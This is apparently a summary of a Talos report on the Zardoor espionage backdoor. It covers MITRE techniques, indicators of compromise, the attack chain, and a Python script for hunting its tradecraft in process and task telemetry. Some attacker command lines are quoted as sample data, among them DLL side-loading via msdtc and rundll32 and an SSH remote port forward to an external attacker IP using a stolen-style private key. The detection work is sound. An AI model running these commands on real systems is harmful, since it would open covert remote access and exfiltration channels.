Keypoints
- Cisco Talos identified a persistent espionage campaign (since at least March 2021) targeting an Islamic non-profit in Saudi Arabia that exfiltrated data roughly twice monthly.
- The adversary deployed a custom backdoor family named Zardoor (zar32.dll and zor32.dll) delivered via a malicious oci.dll loader and MSDTC side-loading.
- Attackers used and modified open-source reverse-proxy tools (FRP, sSocks, Venom) — including removing VC runtime dependencies — to create persistent reverse tunnels and SOCKS/HTTPS proxies for C2 and exfiltration.
- Persistence mechanisms included DLL side-loading via msdtc.exe, scheduled tasks registered under legitimate-looking security task names (e.g., “KasperskySecurity”) to run proxy clients roughly every 20 minutes, and retry loops to ensure the MSDTC service registration succeeds.
- Zar32 provides encrypted C2 over HTTPS/SOCKS, remote PE execution in memory, remote shellcode execution, and dynamic updating of C2 IP/host/port; zor32 handles service installation, mutex checks, and relaunch attempts to maintain presence.
- Movement and tool deployment used living-off-the-land binaries (WMI, rundll32, msdtc.exe, taskkill, netstat) to execute payloads, perform lateral actions, and evade detection.
- Operators stored SSH private keys on victims and configured remote port forwarding (SSH tunneling) to expose internal services externally, enabling ongoing access and data exfiltration.
MITRE Techniques
- [T1090.003] Proxy: Multi-hop Proxy – Reverse proxy tools (FRP, Venom, sSocks) were used to create tunnels and multi-hop proxies for remote access and exfiltration (‘Reverse proxies allow a computer connected to the internet to create a tunnel’).
- [T1105] Ingress Tool Transfer – Dropper installs and executes the malicious oci.dll which contains embedded payloads (zar32.dll, zor32.dll) (‘The dropper drops a different version of oci.dll based on the OS bitness’).
- [T1018] Remote System Discovery – The actor performed discovery of remote systems to support lateral movement and target selection (‘Remote System Discovery’).
- [T1033] System Owner/User – The campaign collected system owner/user context as part of discovery (‘System Owner/User’).
- [T1049] System Network Connections Discovery – The actor examined network connections and used netstat to validate SSH forwarding and connections (‘netstat -ano | findstr 70.34’).
- [T1057] Process Discovery – Process listing and task management utilities were used to find and terminate processes (e.g., taskkill to kill ssh/shd processes) (‘taskkill’).
- [T1087.002] Account Discovery: Domain Account – Account discovery techniques were employed to enumerate domain accounts (‘Account Discovery: Domain Account’).
- [T1053.005] Scheduled Task/Job: Scheduled Task – Reverse proxies were registered as scheduled tasks (replacing legitimate task names) to run periodically (~20 minutes) for persistence (‘registers their reverse proxies as scheduled tasks’).
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – The dropper used msdtc.exe to register and load a malicious oci.dll which side-loaded zar32.dll/zor32.dll (‘side-loading backdoors contained in “oci.dll” via MSDTC’).
- [T1047] Windows Management Instrumentation – WMI was used for lateral movement and remote process spawning to deploy tools like Zardoor (‘used Windows Management Instrumentation (WMI) to move laterally’).
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The actor executed commands and launched DLL exports via rundll32.exe and command-line utilities (‘rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry’).
- [T1204.002] User Execution: Malicious File – The initial dropper and delivered DLLs were executed on victim systems to establish the backdoor (‘The dropper installs and executes the malicious “oci.dll”’).
- [T1055] Process Injection – Zar32 supports remote shellcode execution and in-memory PE execution, capabilities that rely on process-injection-style loading rather than on-disk execution (‘Remote shellcode execution’).
- [T1055.001] Process Injection: Dynamic-link Library Injection – rundll32.exe was used to load the dropped DLLs and invoke their MainEntry export, so the backdoor code runs inside a signed Microsoft host process (‘rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry’).
- [T1070.004] File Deletion – The dropper creates and uses batch cleanup scripts to remove the dropper and delete traces (‘The batch script deletes the dropper and then deletes itself.’).
- [T1048] Exfiltration Over Alternative Protocol – Data exfiltration relied on tunnels and proxy channels (FRP/SSH/HTTP-over-proxy) rather than standard channels (‘exfiltrates data approximately twice a month’ and ‘remote port forwarding’).
Indicators of Compromise
- [File names] persistence & payloads – zar32.dll, zor32.dll, and other related files (oci.dll, win_oci_41aa0d5.dll, xz330ksdfg.bat, msbuildss.exe, id_rsa).
- [IP addresses] C2 and remote servers – 1.0.0[.]1, 70[.]34[.]208[.]197 (used in connection checks and SSH forwarding), and 1.0.0[.]2 / 1.0.0[.]3 referenced for C2.
- [Scheduled task names] persistence artifacts – “KasperskySecurity”, “Microsoft Security Essentialss” (legitimate-looking task names observed for attacker-created tasks running msbuildss.exe; note the trailing double “s” in the second name).
- [Mutexes] runtime indicators – 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, 6c2711b5-e736-4397-a883-0d181a3f85ae (used by zar32/zor32 to detect running instances and prevent duplicates).
- [SSH artifacts] remote access keys – c:\users\[redacted]\.ssh\id_rsa and known_hosts (private key and known_hosts files stored to enable SSH remote port forwarding).
- [User-Agent strings] C2 traffic fingerprinting – example UA for 64-bit: “Mozilla/5.0 (Windows NT .; Trident/7.0; rv:11.0) like Gecko”, and WOW64 variant including “WOW64”.
- [URLs/Endpoints] C2 endpoints – 1.0.0[.]1/index.html, 1.0.0[.]2/index.html (used by zar32.dll to establish C2 over HTTPS/Cloudflare-associated IPs).
The attack chain begins with a dropper that writes a bitness-appropriate oci.dll into the system and attempts to register it with MSDTC via “msdtc -install”. If the MSDTC service cannot be stopped, the dropper patches oci.dll, writes it to %TEMP% (e.g., win_oci_41aa0d5.dll), and executes it with rundll32 to extract zar32.dll and zor32.dll. The embedded DLLs are dropped into System32, %userprofile%, or %TEMP% depending on markers (‘1ISSYSTEM’ / ‘1ISAUTORUN’), then launched via rundll32 (e.g., rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry). The MSDTC registration gives the backdoor DLL side-loading persistence; the rundll32 call gives immediate execution.
Zar32 implements an HTTP/SSL RAT with encrypted C2, in-memory PE execution, remote shellcode execution, session ID search, and dynamic C2 reconfiguration. It connects to attacker-controlled endpoints (e.g., 1.0.0[.]1/index.html) over SSL using browser-like User-Agent strings and supports commands to exfiltrate data, run payloads, execute shellcode, and update C2 settings. Zor32 complements this by ensuring service installation (msdtc.exe), creating mutexes to detect running instances, and retrying up to 10 times to install/start MSDTC to maintain persistence and re-launch zar32 when needed.
For covert C2 and exfiltration, operators deployed and customized open-source reverse-proxy tools (FRP, sSocks, Venom), removed VC runtime dependencies from sSocks, and registered proxy clients as scheduled tasks (replacing legitimate task names such as “KasperskySecurity”) to run every ~20 minutes. They also staged SSH keys (c:\users\…\.ssh\id_rsa and known_hosts) and used scripts and a renamed SSH client (e.g., 2.vbs, shd.exe) to establish remote port forwarding (remote port 443 → local port 22) and validate the tunnels via netstat, enabling remote access to internal services and regular data exfiltration.
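The chain described above (msdtc -install, rundll32 loading a DLL by its MainEntry export, look-alike scheduled tasks with a short interval, SSH remote port forwarding from a user-profile key, and netstat piped to findstr to validate the tunnel) gives several host-level hunting opportunities. The following is an added example, not Talos or Zardoor code: a small Python hunt over process-creation and scheduled-task records. The record field names, the sample events, and the OpenSSH-style `-R 443:127.0.0.1:22` command line for shd.exe are assumptions made for the example; the page only states that port 443 was forwarded to 22.

```python
"""Hunt for Zardoor-style tradecraft in process-creation and scheduled-task telemetry.

Added example for this summary, not code from the Talos report. Event field names
(type, image, cmdline, name, action, interval_minutes) are assumed; the sample events
are constructed to mirror the command lines described on the page.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


# Security-product words that the attacker-created task names imitated. "kaspersky" and
# "security essentials" come from the page; the rest are assumptions for generality.
VENDOR_WORDS = ("kaspersky", "security essentials", "defender", "mcafee", "symantec", "sophos")
# Directories where a task action for a real security product would normally live.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# DLL names from the report: the patched loader in %TEMP%, oci.dll itself, and the backdoors.
ZARDOOR_DLL = re.compile(r"(?:^|[\\/])(?:win_oci_[0-9a-f]+|oci|zar32|zor32)\.dll\b", re.I)
# rundll32 <dll>,<export> or rundll32 <dll> <export>; unquoted paths only, as on the page.
RUNDLL32_CALL = re.compile(r"rundll32(?:\.exe)?\s+(\S+?\.dll)[,\s]+(\w+)", re.I)
# OpenSSH remote forward: -R <remote_port>:<host>:<local_port>
SSH_REMOTE_FWD = re.compile(r"(?:^|\s)-R\s*(\d+):([\w.\-]+):(\d+)", re.I)
# A private key read from a user profile's .ssh directory.
SSH_PROFILE_KEY = re.compile(r"-i\s+\S*\.ssh\\id_rsa", re.I)
# "netstat -ano | findstr <digits>" as used to validate the tunnel to the remote server.
NETSTAT_FINDSTR = re.compile(r"netstat\s+-ano.*\|\s*findstr\s+\d", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list[Finding]:
    out: list[Finding] = []
    image, cmd = basename(ev["image"]), ev["cmdline"]
    # Service (re)registration used to side-load oci.dll; rare on a healthy host.
    if image == "msdtc.exe" and re.search(r"\s-(?:un)?install\b", cmd, re.I):
        out.append(Finding("msdtc_install", cmd))
    if image == "rundll32.exe":
        m = RUNDLL32_CALL.search(cmd)
        # Flag the known DLL names, and any DLL invoked through a "MainEntry" export.
        if m and (ZARDOOR_DLL.search(m.group(1)) or m.group(2).lower() == "mainentry"):
            out.append(Finding("rundll32_oci_loader", cmd))
    m = SSH_REMOTE_FWD.search(cmd)
    if m:
        rport, host, lport = m.groups()
        out.append(Finding("ssh_remote_port_forward", f"remote {rport} -> {host}:{lport}"))
    if SSH_PROFILE_KEY.search(cmd):
        out.append(Finding("ssh_key_in_user_profile", cmd))
    if NETSTAT_FINDSTR.search(cmd):
        out.append(Finding("netstat_findstr_ip", cmd))
    return out


def check_task(ev: dict) -> list[Finding]:
    out: list[Finding] = []
    name, action = ev["name"].lower(), ev["action"].lower()
    from_trusted = any(action.startswith(d) for d in TRUSTED_DIRS)
    # A "security product" task whose binary is not under Windows/Program Files.
    if any(w in name for w in VENDOR_WORDS) and not from_trusted:
        out.append(Finding("lookalike_task_untrusted_path", f"{ev['name']} -> {ev['action']}"))
    # Proxy clients were re-run roughly every 20 minutes; short intervals from
    # user-writable paths are worth a look regardless of the task name.
    if ev.get("interval_minutes", 0) and ev["interval_minutes"] <= 30 and not from_trusted:
        out.append(Finding("short_interval_task_untrusted_path", f"{ev['name']} every {ev['interval_minutes']} min"))
    return out


def hunt(events: list[dict]) -> list[Finding]:
    out: list[Finding] = []
    for ev in events:
        out.extend(check_process(ev) if ev["type"] == "process" else check_task(ev))
    return out


# Constructed sample telemetry (not real logs); paths and the shd.exe command line are assumed.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\msdtc.exe", "cmdline": "msdtc -install"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\victim\AppData\Local\Temp\win_oci_41aa0d5.dll MainEntry"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign control-panel launch
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c netstat -ano | findstr 70.34"},
    {"type": "process", "image": r"C:\Users\victim\AppData\Roaming\shd.exe",
     "cmdline": r"shd.exe -N -R 443:127.0.0.1:22 -i C:\Users\victim\.ssh\id_rsa user@70.34.208.197"},
    {"type": "task", "name": "KasperskySecurity",
     "action": r"C:\Users\victim\AppData\Roaming\msbuildss.exe", "interval_minutes": 20},
    {"type": "task", "name": "GoogleUpdateTaskMachineUA",  # benign: vendor path, hourly
     "action": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "interval_minutes": 60},
    {"type": "task", "name": "OneDrive Standalone Update Task",  # benign: AppData, but daily
     "action": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe",
     "interval_minutes": 1440},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

The task rules deliberately key on the action path rather than the task name alone, because a renamed proxy client under a vendor-looking task name is exactly what the operators did; the OneDrive record shows that "runs from AppData" on its own is not enough to alert on.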
Read more: https://blog.talosintelligence.com/new-zardoor-backdoor/